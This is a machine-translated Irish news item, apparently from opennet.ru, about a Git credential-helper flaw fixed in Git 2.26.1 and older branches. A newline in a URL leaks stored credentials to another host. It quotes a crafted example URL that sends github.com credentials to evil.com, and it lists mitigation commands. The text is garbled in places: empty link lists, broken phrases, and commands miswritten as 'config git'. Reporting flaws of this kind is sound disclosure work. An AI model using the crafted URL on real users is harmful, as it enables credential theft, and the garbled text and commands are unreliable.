scaoileadh ceartaitheach an chórais rialaithe foinse dáilte Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 agus 2.17.4, i a chuir deireadh le () sa láimhseálaí”", rud a fhágann go seoltar dintiúir chuig an ósta mícheart nuair a fhaigheann cliant git rochtain ar stór ag baint úsáide as URL formáidithe go speisialta ina bhfuil carachtar nualíne. Is féidir an leochaileacht a úsáid chun socrú a dhéanamh le dintiúir ó óstach eile a sheoladh chuig freastalaí atá á rialú ag an ionsaitheoir.
Agus URL cosúil le “https://evil.com?%0ahost=github.com/” á shonrú, déanfaidh an láimhseálaí inchreidte agus é ag nascadh leis an óstach evil.com pas a fháil sna paraiméadair fíordheimhnithe atá sonraithe do github.com. Tarlaíonn an fhadhb nuair a dhéantar oibríochtaí cosúil le "git clone", lena n-áirítear URLanna a phróiseáil le haghaidh fomhodúil (mar shampla, déanfaidh "git submodule update" na URLanna a shonraítear sa chomhad .gitmodules ón stór a phróiseáil go huathoibríoch). Tá an leochaileacht is contúirtí i gcásanna ina ndéanann forbróir clónáil ar stór gan an URL a fheiceáil, mar shampla, nuair a bhíonn sé ag obair le fo-mhodúil, nó i gcórais a dhéanann gníomhartha uathoibríocha, mar shampla, i scripteanna tógála pacáiste.
Chun bac a chur ar leochaileachtaí i leaganacha nua carachtar newline a rith in aon luachanna a tharchuirtear tríd an bprótacal malartaithe inchreidte. Le haghaidh dáiltí, is féidir leat scaoileadh nuashonruithe pacáiste a rianú ar na leathanaigh , , , , , , .
Mar réiteach chun an fhadhb a bhlocáil Ná húsáid credential.helper agus rochtain á fáil agat ar stórtha poiblí agus ná húsáid "git clone" sa mhód "--recurse-submodules" le stórtha gan seiceáil. Chun an láimhseálaí credential.helper a dhíchumasú go hiomlán, rud a dhéanann agus pasfhocail a aisghabháil ó , cosanta nó comhad le pasfhocail, is féidir leat na horduithe a úsáid:
config git --unset credential.helper
config git --global --unset credential.helper
config git --system --unset credential.helper
Foinse: oscailtenet.ru